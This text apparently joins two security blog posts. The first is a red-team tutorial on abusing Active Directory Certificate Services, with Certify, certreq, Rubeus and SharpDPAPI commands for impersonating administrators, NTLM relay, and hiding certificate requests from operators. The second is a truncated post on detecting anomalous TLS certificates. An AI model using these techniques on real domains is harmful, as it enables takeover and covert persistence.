
ADCS Attack Surface Discovery and Exploitation

7 December 2021 at 11:11

Author: Imanfeng

0x00 Preface

At Black Hat USA 2021, SpecterOps released a whitepaper on abusing Active Directory Certificate Services. Although ADCS is not installed by default, it is widely deployed in large enterprise domains. Drawing on real-world engagements, this article explains how ADCS techniques can be used to take over domain controllers, which object ACLs can be abused for better persistence, and covers ADCS fundamentals, attack surface, and post-exploitation.

0x01 Technical Background

1. Certificate Services

PKI (Public Key Infrastructure)

In a PKI (Public Key Infrastructure), a digital certificate binds the public key of a key pair to the identity of its owner. To prove the identity asserted in the certificate, the owner answers a challenge using the private key, which only the owner can access.

Microsoft provides a PKI solution that is fully integrated into the Windows ecosystem for public-key encryption, identity management, certificate distribution, certificate revocation, and certificate management. Once enabled, it records which user enrolled a certificate so that the certificate can later be used for authentication or be revoked: this is Active Directory Certificate Services (ADCS).

Key ADCS Terminology

  • Root Certification Authority
    Certificates are built on a chain of trust; the first certification authority installed is the root CA, the starting point of the trust chain.
  • Subordinate CA
    A subordinate CA is a child node in the trust chain, usually one level below the root CA.
  • Issuing CA
    An issuing CA is a subordinate CA that issues certificates to endpoints (such as users, servers, and clients); not every subordinate CA has to be an issuing CA.
  • Standalone CA
    Usually defined as a CA running on a server that is not joined to the domain.
  • Enterprise CA
    Usually defined as a CA that is domain-joined and integrated with Active Directory Domain Services.
  • Digital Certificate
    Electronic proof of a user's identity, issued by a Certificate Authority (usually following the X.509 standard).
  • AIA (Authority Information Access)
    Authority Information Access is applied to certificates issued by a CA and points to the location of the certificate's issuer, guiding validation of the certificate chain.
  • CDP (CRL Distribution Point)
    Contains information about the location of the CRL, such as a URL (web server) or an LDAP path (Active Directory).
  • CRL (Certificate Revocation List)
    The CRL is a list of revoked certificates; clients use the CRL to verify whether a presented certificate is still valid.

ADCS Service Architecture

An example two-tier PKI deployment from Microsoft's official ADCS architecture looks like this:

ORCA1: a standalone, offline root CA is deployed first using a local administrator; AIA and CRL are configured, and the root CA certificate and CRL file are exported.

  1. Because the root CA has to be embedded in every device that validates certificates, for security reasons the root CA is usually network-isolated from clients or kept powered off and outside the domain. If the root CA were damaged by administrator error or compromised by an attacker, the root CA certificate embedded in every device would have to be replaced, which is extremely costly.
  2. To validate certificates issued by the root CA, CRL checking must be available to all endpoints; for this purpose a web server is installed on the subordinate CA (APP1) to host the validation content. The root CA machine is used very rarely, only when another subordinate/issuing CA is added, the CA is renewed, or the CRL is changed.

APP1: the subordinate CA used for endpoint enrollment, which typically involves the following key configuration:

  1. The root CA certificate is placed in the Configuration container of Active Directory, which lets domain client computers trust the root CA certificate automatically without distributing it via Group Policy.
  2. After requesting APP1's CA certificate on the offline ORCA1, the root CA certificate and CRL file are transferred to APP1's local store via removable media, so that APP1 immediately and directly trusts the root CA certificate and the root CA CRL.
  3. A web server is deployed to distribute certificates and CRLs, and the CDP and AIA are configured.

LDAP Attributes

ADCS defines the relevant objects in the LDAP container CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=; some of them were mentioned above.

Certificate templates

Most of the ADCS attack surface is concentrated in certificate templates, stored under CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC= with objectClass pKICertificateTemplate. A certificate template defines the following fields:

  • General settings: the certificate's validity period
  • Request handling: the certificate's purpose and whether the private key may be exported
  • Cryptography: the cryptographic service provider (CSP) to use and the minimum key size
  • Extensions: the list of X509v3 extensions to include in the certificate
  • Subject name: taken either from values supplied by the user in the request, or from the identity of the domain principal requesting the certificate
  • Issuance requirements: whether "CA certificate manager" approval is required before the request is granted
  • Security descriptor: the ACL of the certificate template, including the extended rights required to enroll in the template

To issue certificates from a template, the template is first configured in certtmpl.msc on the CA and then published in certsrv.msc. Under Extensions, the template object's EKU (pKIExtendedKeyUsage) attribute contains an array of the OIDs (Object Identifiers) enabled in the template.

These application policies (EKU OIDs) determine what the certificate may be used for; only when one of the following OIDs is present can the certificate be used for Kerberos authentication (a small sketch for checking this follows the table):

Description OID
Client Authentication 1.3.6.1.5.5.7.3.2
PKINIT Client Authentication 1.3.6.1.5.2.3.4
Smart Card Logon 1.3.6.1.4.1.311.20.2.2
Any Purpose 2.5.29.37.0
SubCA (no EKUs)
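
As an illustration of the EKU check described above, the following minimal sketch uses the Python cryptography library (my own addition; the original post only uses Windows tooling) to test whether a certificate carries one of the authentication-capable OIDs from the table, or no EKU extension at all.

# Minimal sketch (not from the original post): check whether a certificate's EKUs
# allow it to be used as a Kerberos/PKINIT client authentication credential.
from cryptography import x509

AUTH_OIDS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
}

def usable_for_kerberos_auth(pem_bytes: bytes) -> bool:
    cert = x509.load_pem_x509_certificate(pem_bytes)
    try:
        eku = cert.extensions.get_extension_for_class(x509.ExtendedKeyUsage).value
    except x509.ExtensionNotFound:
        return True   # no EKU at all: the "SubCA (no EKUs)" case listed above
    return any(oid.dotted_string in AUTH_OIDS for oid in eku)

with open("cert.pem", "rb") as f:   # path is only an example
    print(usable_for_kerberos_auth(f.read()))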

Enterprise NTAuth store

NtAuthCertificates contains the list of certificates of all CAs trusted for authentication; a CA that is not in this list cannot process requests for user authentication certificates.

Publish/add a certificate to NTAuth:
certutil -dspublish -f IssuingCaFileName.cer NTAuthCA

To view all certificates in NTAuth:
certutil -viewstore -enterprise NTAuth

To delete a certificate from NTAuth:
certutil -viewdelstore -enterprise NTAuth

Domain-joined machines keep a cached copy in the registry:

HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates

When the "automatic certificate enrollment" Group Policy is enabled, this local cache is only refreshed when Group Policy is updated.

Certification Authorities & AIA

The Certification Authorities container corresponds to the trusted root CA certificate store. When a new issuing CA is installed, its certificate is automatically placed in the AIA container.

All certificates from these containers are likewise propagated to every network-connected client as part of Group Policy processing; if this synchronization breaks, KDC authentication fails with a KDC_ERR_PADATA_TYPE_NOSUPP error.

Certificate Revocation List

As mentioned in the PKI service architecture section, the certificate revocation list (CRL) is a list of revoked certificates published by the CA that issued them; comparing a certificate against the CRL is one way to determine whether the certificate is still valid.

CN=<CA name>,CN=<ADCS server>,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=

Certificates are usually identified by their serial number; besides the serial numbers of the revoked certificates, the CRL also records the revocation reason and the time each certificate was revoked.
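
To make the CRL contents concrete, here is a minimal sketch (my own addition, not from the original post) that parses a CRL with the Python cryptography library and prints the serial number and revocation date of each entry.

# Minimal sketch: list revoked serial numbers and revocation dates from a CRL file.
from cryptography import x509

def dump_crl(path: str) -> None:
    with open(path, "rb") as f:
        data = f.read()
    try:
        crl = x509.load_pem_x509_crl(data)
    except ValueError:
        crl = x509.load_der_x509_crl(data)   # CRLs are often distributed in DER form
    print("Issuer:", crl.issuer.rfc4514_string())
    for revoked in crl:
        print(hex(revoked.serial_number), revoked.revocation_date)

dump_crl("corp-CA01-CA.crl")   # example path; use whatever you downloaded from the CDP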

2. Certificate Enrollment

Certificate Enrollment Process

The certificate enrollment flow in ADCS is roughly as follows (a sketch of steps 1-2 follows the list):

  1. The client generates a public/private key pair;
  2. The public key is placed in a certificate signing request (CSR) message together with other information (such as the certificate subject and the certificate template name), and the request is signed with the private key;
  3. The CA checks whether the user is allowed to request certificates, whether the requested certificate template exists, and whether the request content complies with the template;
  4. If these checks pass, the CA generates a certificate containing the client's public key and signs it with its own private key;
  5. The signed certificate can then be retrieved and used.
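
As an illustration of steps 1 and 2, the sketch below builds a key pair and a generic CSR with the Python cryptography library; this is my own example of the CSR format, not the Windows enrollment client, and the subject name is a placeholder.

# Minimal sketch: generate a key pair and a CSR (steps 1-2 of the enrollment flow).
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

# Step 1: the client creates a public/private key pair
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

# Step 2: the public key and subject information go into a CSR signed with the private key.
# (In real ADCS enrollment the template name travels in a Microsoft-specific request
# attribute, which is omitted here.)
csr = (
    x509.CertificateSigningRequestBuilder()
    .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"user01")]))  # placeholder
    .sign(key, hashes.SHA256())
)

print(csr.public_bytes(serialization.Encoding.PEM).decode())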

Certificate Enrollment Methods

1. Certification Authority Web Enrollment

If Certification Authority Web Enrollment is selected when deploying the CA, certificates can be requested at http://CA-Computer/certsrv after authenticating.

2. Client GUI Enrollment

Domain-joined machines can request certificates through the certmgr.msc (user certificates) or certlm.msc (computer certificates) GUI.

3. Command-Line Enrollment

Domain-joined machines can request certificates with certreq.exe or the PowerShell Get-Certificate cmdlet; usage examples appear later in this article.

4. DCOM Enrollment

DCOM-based certificate enrollment follows the MS-WCCE protocol; most current C#, Python, and PowerShell ADCS tooling requests certificates via WCCE.

Certificate Enrollment Permissions

Access control in Active Directory is based on the access control model, which has two basic parts:

  • the access token, which contains information about the logged-on user
  • the security descriptor, which contains the security information protecting a securable object

ADCS defines enrollment permissions (which principals may request certificates) with two layers of security: one on the certificate template AD object and another on the enterprise CA itself.

On the issuing CA, certtmpl.msc shows all certificate templates, and the Security tab shows the access rights users have on each template.

certsrv.msc on the issuing CA shows the access rights the CA itself grants to users.

0x02 Certificate Usage

1. Certificate Authentication

Kerberos Authentication

Kerberos is the primary authentication protocol in domain environments. Its flow is roughly as follows:

  1. AS_REQ: the client authenticates to the KDC with the client hash and a timestamp;
  2. AS_REP: the KDC checks the client hash and timestamp; if they are correct, it returns a TGT encrypted with the krbtgt hash along with the PAC and related information;
  3. TGS_REQ: the client requests a TGS ticket from the KDC, presenting its TGT and the requested SPN;
  4. TGS_REP: if the KDC recognizes the SPN, it returns a service ticket (ST) encrypted with the NTLM hash of that service account;
  5. AP_REQ: the client presents the ST to the target service and passes the PAC along for checking. The service uses the PAC to look up the user's SID, group membership, etc. and compares them against its own ACLs; if the check fails, an appropriate RPC status code is returned;
  6. AP_REP: the server validates the AP-REQ and, if successful, sends an AP-REP; client and server then verify each other using the session key generated along the way.

PKINIT Authentication

RFC 4556 defines PKINIT as an extension to Kerberos that uses X.509 certificates to obtain Kerberos tickets (TGTs).

PKINIT differs from plain Kerberos mainly in the AS exchange:

  1. PKINIT AS_REQ: the request includes the certificate and is signed with the private key. The KDC validates the signature with the public key and, once verified, returns a TGT encrypted with the certificate's public key; the response is signed with the KDC's private key;
  2. PKINIT AS_REP: the client verifies the signature with the KDC's public key, then decrypts the response with the certificate's private key and obtains the TGT.

The detailed protocol specification: http://pike.lysator.liu.se/docs/ietf/rfc/45/rfc4556.xml

NTLM Credentials

In 2016, the ability to recover NTLM credentials from a certificate was integrated into kekeo and mimikatz. The key point is that when a certificate is used for authentication via the PKCA extension, the returned PAC contains the user's NTLM hash.

Even if the user's password changes, the NTLM hash can be retrieved at any time with the certificate. A certificate usable for Kerberos authentication must satisfy the following conditions:

1. Certificate template OID

As noted earlier, only the known application policy OIDs Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose, or SubCA (no EKUs) allow a certificate to serve as a PKINIT authentication credential.

2. Certificate request permissions

  • The user has permission to request certificates from the CA;
  • The user has permission to enroll in the certificate template.

2. Certificate Acquisition

Exporting machine certificates

Machine certificates can be exported through the certlm.msc GUI or with certutil.exe.

When the private key is marked as non-exportable, Mimikatz's crypto::capi command can patch the CAPI in the current process so that the Crypto APIs will export the certificate together with its private key.

Exporting user certificates

User certificates can be exported through the certmgr.msc GUI or with certutil.exe.

If the private key is restricted, crypto::capi can likewise be tried to export the certificate.

Searching for certificates on disk

In real engagements, certificates and private keys are often found lying around in folders and do not need to be exported; the relevant file extensions are:

Extension Description
.pfx\ .p12\ .pkcs12 contains the certificate and private key, usually password-protected
.pem base64-encoded certificate and/or private key, convertible with openssl
.key contains only the private key
.crt\ .cer contains only the certificate
.csr certificate signing request; does not contain the private key
.jks\ .keystore\ .keys may contain certificates and private keys used by Java applications

Depending on your needs, open-source tools or custom tooling can be used to search for files with these extensions (a minimal search sketch follows).
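
The following is a minimal sketch of the idea above (my own example, not a tool from the post): it walks a directory tree and reports files whose extension suggests certificate or key material.

# Minimal sketch: recursively look for certificate/key material by file extension.
import os

CERT_EXTENSIONS = {
    ".pfx", ".p12", ".pkcs12", ".pem", ".key",
    ".crt", ".cer", ".csr", ".jks", ".keystore", ".keys",
}

def find_cert_files(root: str):
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() in CERT_EXTENSIONS:
                yield os.path.join(dirpath, name)

for path in find_cert_files(r"C:\Users"):   # starting point is just an example
    print(path)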

0x03 Certificate Abuse

This section walks through ADCS abuse, from certificate template misconfigurations to persistence.

1. Certificate Templates

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT abuse

This misconfiguration is the most common one in enterprise ADCS deployments. The conditions that must be met are:

  • The issuing CA grants low-privileged users enrollment rights (default)
  • Manager approval is disabled in the template (default)
  • No authorized signatures are required in the template (default)
  • The template allows low-privileged users to enroll
  • The template defines an EKU that enables authentication
  • The certificate template allows the requester to specify a subjectAltName in the CSR

If these conditions are met, an attacker can assert an arbitrary identity through the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag when requesting a certificate, and thus obtain a certificate for a spoofed identity. Certify is the ADCS tooling released alongside the whitepaper.

Certify.exe find /vulnerable

Use certutil.exe -TCAInfo to check the CA status and the current user's enrollment rights.

Use Certify's altname option to request a certificate while impersonating administrator:

Certify.exe request /ca:"CA01.corp.qihoo.cn\corp-CA01-CA" /template:"ESC1" /altname:administrator

Once the request is approved, a PEM file containing both the public and private key is returned; convert it with openssl:

/usr/bin/openssl pkcs12 -in ~/cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out ~/cert.pfx

Rubeus added PKINIT certificate support after version 20.11; using cert.pfx to request a TGT as administrator succeeds and yields an administrator ticket:

Rubeus4.exe asktgt /user:Administrator /certificate:cert.pfx /password:123456 /outfile:cert.kirbi /ptt

Any EKU OR no EKU

The first four conditions are the same as in the previous case, and this applies to user certificates rather than machine certificates; the main difference lies in the EKU definition:

  • The issuing CA grants low-privileged users enrollment rights (default)
  • Manager approval is disabled in the template (default)
  • No authorized signatures are required in the template (default)
  • The template allows low-privileged users to enroll
  • The certificate template defines no EKU or the Any Purpose EKU

certutil.exe can be used to check whether a template's pKIExtendedKeyUsage field is empty:

certutil -v -dstemplate

Certify successfully locates the malicious template.

This technique does not directly allow impersonating a user through Kerberos authentication. Any Purpose (OID 2.5.29.37.0) can be used for any purpose, including client authentication; if no EKU is specified at all, i.e. pKIExtendedKeyUsage is empty, the certificate is effectively a subordinate CA certificate and can be used in any scenario, including issuing certificates to other users.

As noted earlier, a CA certificate that is not in NtAuthCertificates cannot issue certificates valid for authentication, so this technique cannot directly forge users. It can, however, sign certificates for other applications, for example ADFS, a standard Windows Server role from Microsoft that provides web sign-in with existing Active Directory credentials; those interested can set up an environment and try it.

Enrollment Agent certificate abuse

The CA ships with some basic certificate templates, but the standard templates cannot be used directly; they must first be duplicated and configured. For convenience, some organizations configure a server so that an administrator or enrollment agent can enroll for certain templates directly on behalf of other users.

This requires two configured templates:

  1. A template that issues the "Enrollment Agent" certificate
  2. A template that permits enrollment on behalf of other users

Template one issues the "Enrollment Agent" certificate:

  • The issuing CA grants low-privileged users enrollment rights (default)
  • Manager approval is disabled in the template (default)
  • No authorized signatures are required in the template (default)
  • The template allows low-privileged users to enroll
  • The certificate template defines the Certificate Request Agent EKU (1.3.6.1.4.1.311.20.2.1)

Template two allows the "Enrollment Agent" certificate to be used to request authentication certificates on behalf of other users:

  • The issuing CA grants low-privileged users enrollment rights (default)
  • Manager approval is disabled in the template (default)
  • No authorized signatures are required in the template (default)
  • The template allows low-privileged users to enroll
  • The template defines an EKU that enables authentication
  • The template schema version is 1, or greater than 2 with an application policy issuance requirement of Certificate Request Agent
  • Enrollment agent restrictions are not implemented on the CA (default)

Request an enrollment agent certificate and export it together with its private key as esc3_1.pfx.

Use Certify with esc3_1.pfx to request esc3_2.pfx, an authentication certificate on behalf of administrator; the resulting certificate can likewise be used for pass-the-ticket:

Certify.exe request /ca:"CA01.corp.qihoo.cn\corp-CA01-CA" /template:ESC3_2 /onbehalfof:administrator /enrollcert:esc3_1.pfx /enrollcertpw:123456

The certificate is issued to administrator.

EDITF_ATTRIBUTESUBJECTALTNAME2 abuse

Some organizations enable the EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the issuing CA for business reasons to allow SANs (subject alternative names), letting users state their own identity when requesting a certificate. For example, in the certificate-based authentication (CBA) for Azure AD scenario, certificates are distributed to mobile devices through NDES, and users declare their identity with an RFC 822 name or principal name in the SAN extension.

The exploitation is the same as the first technique and again allows identity spoofing; the difference is that one relies on a certificate template attribute while the other relies on a CA-level setting.

  • The enterprise CA grants low-privileged users enrollment rights (default)
  • Manager approval is disabled in the template (default)
  • No authorized signatures are required in the template (default)
  • The CA has EDITF_ATTRIBUTESUBJECTALTNAME2 set

Check whether the CA has the SAN flag enabled via the remote registry (a sketch for interpreting the returned EditFlags value follows the command):

certutil -config "CA01.corp.qihoo.cn\corp-CA01-CA" -getreg "policy\EditFlags"
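
certutil prints EditFlags as a combination of named flags and a numeric value; as a small aid (my own addition, not from the original post), the sketch below tests whether the EDITF_ATTRIBUTESUBJECTALTNAME2 bit (0x00040000) is set in that value.

# Minimal sketch: check whether EDITF_ATTRIBUTESUBJECTALTNAME2 is set in an EditFlags value.
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000

def san_flag_enabled(edit_flags: int) -> bool:
    return bool(edit_flags & EDITF_ATTRIBUTESUBJECTALTNAME2)

# Example: paste the numeric EditFlags value reported by certutil (0x15014e is illustrative)
print(san_flag_enabled(0x15014e))   # True when the SAN flag is part of the value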

Manually craft the certificate request:

certreq -new usercert.inf certrequest.req

#usercert.inf
[NewRequest]

KeyLength=2048
KeySpec=1
RequestType = PKCS10
Exportable = TRUE 
ExportableEncrypted = TRUE

[RequestAttributes]
CertificateTemplate=USER

Submit the request to obtain the .cer file (containing the public key certificate) from the previous step; the other .inf fields are described in the official documentation:

certreq -submit -config "CA01.corp.qihoo.cn\corp-CA01-CA" -attrib "SAN:[email protected]" certrequest.req certrequest.cer

Import the .cer on a machine, export it together with the private key as a .pfx, and pass-the-ticket authentication again succeeds.

2. Access Rights

As mentioned earlier, certificate templates and certificate authorities are securable objects in AD, which means security descriptors can specify which principals have which permissions over them; see the ACL documentation for details.

The Security tab of the corresponding object is where user permissions are configured. Five rights are of interest:

Permission Description
Owner Owner of the object; can edit any property
Full Control Full control of the object; can edit any property
WriteOwner Allows the principal to change the owner in the object's security descriptor
WriteDacl Can modify the access control list
WriteProperty Can edit any property

Misconfigured template access rights

Suppose we have already compromised the entire domain and want to use a certificate template for persistence. We can add ACEs such as the following to a harmless, legitimate template:

  • NT AUTHORITY\Authenticated Users -> WriteDacl
  • NT AUTHORITY\Authenticated Users -> WriteProperty

Later, once we regain any domain user's credentials (for example through password spraying), that harmless template can be turned into an exploitable privilege escalation template:

  • msPKI-Certificates-Name-Flag -edit-> ENROLLEE_SUPPLIES_SUBJECT (WriteProperty)
  • msPKI-Certificate-Application-Policy -add-> Server Authentication (WriteProperty)
  • mspki-enrollment-flag -edit-> AUTO_ENROLLMENT (WriteProperty)
  • Enrollment Rights -add-> Control User (WriteDacl)

The malicious template can then be abused with the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT technique to obtain an administrator certificate and perform pass-the-ticket. Unlike Certify, certi can be used from outside the domain.

Misconfigured PKI access rights

If a low-privileged attacker can gain control over CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=, the attacker directly controls the PKI system (the certificate template container, the certification authorities container, the NTAuthCertificates object, the enrollment services container, and so on).

Here CN=Public Key Services,CN=Services,CN=Configuration has an ACE granting the CORP\zhangsan user GenericAll over it.

With this permission we can create a new malicious certificate template and reuse the domain privilege escalation techniques described above.

Misconfigured CA access rights

The CA itself has its own set of security permissions for administration.

We mainly care about the ManageCA and ManageCertificates permissions:

Permission Description
Read Read the CA
ManageCA CA administrator
Issue and manage certificates Certificate manager
Request certificates Request certificates; granted by default

Abuse case 1: hiding CA request records

After obtaining domain admin rights or PKI operator rights, create a malicious certificate template.

Use the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT technique to obtain an administrator pfx certificate for persistence (if the user account is in an abnormal state, the certificate cannot be used).

For stealth, the template can then be deleted, and zhangsan, who holds the ManageCA permission, can call the COM method ICertAdminD2::DeleteRow to remove the traces of the certificate request from the CA database.

Operators then cannot see our request in the certificate console and cannot revoke the certificate. As long as neither the administrator account nor the certificate expires, the certificate remains usable, even if the user's password changes.

Abuse case 2: modifying CA properties for certificate privilege escalation

With the ManageCA permission we can call ICertAdminD2::SetConfigEntry to modify the CA's configuration data, for example flipping the boolean behind Config_CA_Accept_Request_Attributes_SAN, thereby enabling EDITF_ATTRIBUTESUBJECTALTNAME2 on the CA.

From there, the EDITF_ATTRIBUTESUBJECTALTNAME2 abuse described earlier can be used to take control of the domain.

Abuse case 3: approving certificate requests yourself

When configuring templates, some operators set the issuance requirement to CA certificate manager approval as a security measure, so an administrator has to approve each request in certsrv.msc.

With the ManageCertificates permission, ICertAdminD::ResubmitRequest can be called to approve and release the pending abuse certificate request.

3. Other Techniques

Golden Certificates

A stolen certification authority (CA) certificate and its private key can be used to forge certificates for arbitrary users, and those users can authenticate to Active Directory, because the only key needed to sign issued certificates is the CA's private key.

Once the CA server is compromised, mimikatz or SharpDPAPI can extract any CA certificate private key that is not hardware-protected.

SharpDPAPI4.exe certificates /machine 

After converting the format with openssl, ForgeCert or pyForgeCert can be used to forge certificates; a CA certificate with its private key is therefore a "golden certificate".

NTLM Relay to ADCS HTTP Endpoints

This technique works because the HTTP certificate enrollment interfaces are vulnerable to NTLM relay attacks. There are plenty of articles on NTLM relay primitives such as CVE-2018-8581, CVE-2019-1040, and PrinterBug, so they are not covered here.

PetitPotam can coerce a specified server in the domain into authenticating to a chosen target. Against older versions (pre-2016), this can even be triggered anonymously.

By invoking the relevant MS-EFSRPC functions against the domain controller, the DC is made to authenticate to our listener, and the captured NTLM authentication is relayed to the ADCS web enrollment page.

Enrolling a certificate with the relayed DC machine-account NTLM credentials yields the domain controller machine account's base64-encoded certificate.

Using kekeo to request a TGT with it yields DC$ privileges, which are sufficient for DCSync.

0x04 Closing Notes

ADCS techniques are very convenient for privilege escalation and persistence in real-world engagements. Defensive measures against ADCS abuse are described in detail in the whitepaper, so they are not repeated here.

Some of the mitigations reference Microsoft's tiered administration model:

The core idea is that an account only accesses assets of its own tier; access downward is blocked and access upward raises an alert. The CA and ADCS servers' local administrators groups, the PKI, and the owners of certificate templates should therefore all live in Tier 0.

Finally, the Lingteng Lab (灵腾实验室) is hiring senior offensive security experts and senior security researchers; if interested, send a resume to g-linton-lab[AT]360.cn

0x05 References

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://docs.microsoft.com/en-us/windows/win32/ad/how-access-control-works-in-active-directory-domain-services

https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/

https://www.anquanke.com/post/id/245791

Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates with the Half-Space-Trees Algorithm

7 December 2021 at 15:18

Author: Margit Hazenbroek

tl;dr

An approach to detecting suspicious TLS certificates using an incremental anomaly detection model is discussed. This model utilizes the Half-Space-Trees algorithm and provides our security operations teams (SOC) with the opportunity to detect suspicious behavior, in real-time, even when network traffic is encrypted. 

The prevalence of encrypted traffic

As a company that provides Managed Network Detection & Response services, we have observed an increase in the use of encrypted traffic. This trend is broadly welcome. The use of encrypted network protocols yields improved mitigation against eavesdropping. However, in an attempt to bypass security detection that relies on deep packet inspection, it is now a standard tactic for malicious actors to abuse the privacy that encryption enables. For example, when conducting malicious activity, such as command and control of an infected device, connections to the attacker-controlled external domain now commonly occur using HTTPS.

The application of a range of data science techniques is now integral to identifying malicious activity that is conducted using encrypted network protocols. This blogpost expands on one such technique, how anomalous characteristics of TLS certificates can be identified using the Half Space Trees algorithm. In combination with other modelling, like the identification of an unusual JA3 hash [i], beaconing patterns [ii] or randomly generated domains [iii], effective detection logic can be created. The research described here has subsequently been further developed and added to our commercial offering. It is actively facilitating real time detection of malicious activity.

Malicious actors abuse the trust of TLS certificates

TLS certificates are a type of digital certificate, issued by a Certificate Authority (CA) certifying that they have verified the owners of the domain name which is the subject of the certificate. TLS certificates usually contain the following information:

  • The subject domain name
  • The subject organization
  • The name of the issuing CA
  • Additional or alternative subject domain names
  • Issue date
  • Expiry date
  • The public key 
  • The digital signature by the CA [iv]. 

If malicious actors want to use TLS to ensure that they appear as legitimate traffic, they have to obtain a TLS certificate (Mitre, T1608.003) [v]. Malicious actors can obtain certificates in different ways, most commonly by: 

  • Obtaining free certificates from a CA. CAs like Let's Encrypt issue free certificates. Malicious actors are known to widely abuse this trust relationship (vi, vii). 
  • Creating self-signed certificates. Self-signed certificates are not signed by a CA. Certain attack frameworks such as Cobalt Strike offer the option to generate self-signed certificates.
  • Buying or stealing certificates from a CA. Malicious actors can deceive a CA into issuing a certificate for a fake organization.

The following example shows the subject name and issue name of a TLS certificate in a recent Ryuk ransomware campaign.

Subject Name: 
C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com

Issuer Name: 
C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com 

Example 1. Subject and issuer fields in a TLS certificate used in Ryuk ransomware

The meanings of the attributes that can be found in the issuer name and subject name fields of TLS certificates are defined in RFC 5280 and explained in the table below.

Attribute Meaning
C Country of the entity
ST State or province
L Locality
O Organization name
OU Organizational Unit
CN Common Name
Table 1.  The subject usually includes the information of the owner, and the issuer field includes the entity that has signed and issued the certificate (RFC 5280) (viii).

Note the following characteristics that can be observed in this malicious certificate:

  • It is a self-signed certificate, as no CA is present in the Issuer Name. 
  • The Organization name attribute contains the string “lol”. 
  • The Organizational Unit attribute is empty. 
  • A domain name is present in the Common Name (ix, x).

Compare these characteristics to the legitimate certificate used by the fox-it.com domain. 

Subject Name:
C=GB, L=Manchester, O=NCC Group PLC, CN=www.nccgroup.com

Issuer Name:
C=US, O=Entrust, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K

Example 2. Subject and issuer fields in a TLS certificate used by fox-it.com

Observe the attributes in the Subject and Issuer Name. The Subject Name contains information about the owner of the certificate, while the Issuer Name contains information about the CA. 

Using machine learning to identify anomalous certificates

When comparing the legitimate and the malicious certificate, the certificate used in Ryuk ransomware “looks weird”. If humans can identify that the malicious certificate is peculiar, could machines also learn to classify such a certificate as anomalous? To explore this question, a dataset of “known good” and “known bad” TLS certificates was curated. Using white-box algorithms, such as Random Forest, several features were identified that helped classify malicious certificates. For example, the number of empty attributes had a statistical relationship with how likely the certificate was to be used for malicious activities. However, it was soon recognized that such an approach was problematic: there was a risk of “over-fitting” the algorithm to the training data, a situation whereby the algorithm would perform well on the training dataset but perform poorly when applied to real-life data. Especially in a stream of data that evolves over time, such as network data, it is challenging to maintain high detection precision. To be effective, this model needed the ability to become aware of new patterns that may present themselves outside of the small sample of training data provided; an unsupervised machine learning model which could detect anomalies in real time was required.  
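
As an illustration of the kind of features discussed above, the sketch below (our own simplification with illustrative field names, not the production feature set) derives a few simple indicators from the subject and issuer strings, such as the number of empty attributes and whether the certificate is self-signed.

# Minimal sketch: derive simple features from TLS certificate subject/issuer strings.
def parse_dn(dn: str) -> dict:
    """Naively parse 'C=US, ST=TX, O=lol, CN=example.com' into a dict (commas inside values will confuse it)."""
    parts = [p.strip() for p in dn.split(",") if "=" in p]
    return {k.strip(): v.strip() for k, v in (p.split("=", 1) for p in parts)}

def certificate_features(subject: str, issuer: str) -> dict:
    subj, iss = parse_dn(subject), parse_dn(issuer)
    return {
        "empty_attributes": sum(1 for v in subj.values() if not v),
        "self_signed": float(subj == iss),          # identical subject and issuer
        "subject_length": len(subject),
        "has_organization": float(bool(subj.get("O"))),
    }

print(certificate_features(
    "C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com",
    "C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com",
))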

An isolation-based anomaly detection approach

The Isolation Forest was the first isolation-based anomaly detection model, created by Liu et al. in 2008 (xi). The referenced paper presented an intuitive but powerful idea. Anomalous data points are rare. And a property of rarity is that the anomalous data point must be easier to isolate from the rest of the data. 

From this insight, the proposed algorithm computes how easy it is to isolate an anomaly. It achieves this by building a tree that splits the data (visualization 1 includes an example of a tree structure). The more anomalous an observation is, the faster it gets isolated in the tree and the fewer splits are needed. Note that the Isolation Forest is an ensemble method, meaning it builds multiple trees (a forest) and calculates the average number of splits made by the trees to isolate an anomaly (xi). 

An advantage of this approach is that, in contrast to density and distance-based approaches, less computational cost is required to identify anomalies (xi, xii) whilst maintaining comparable levels of performance metrics (viii, ix).

Half-Space-Trees: Isolation-based approach for streaming data 

In 2011, building on their earlier work, Tan and Liu created an isolation-based algorithm called Half-Space-Trees (HST) that utilized incremental learning techniques. HST enables an isolation-based anomaly detection approach to be applied to a stream of continuous data (xiii). The animation below demonstrates how a simple half-space-tree isolates anomalies in the window space with a tree-based structure: 

Visualization 1:  An example of 2-dimensional data in a window divided by two simple half-space-trees, the visualization is inspired by the original paper.

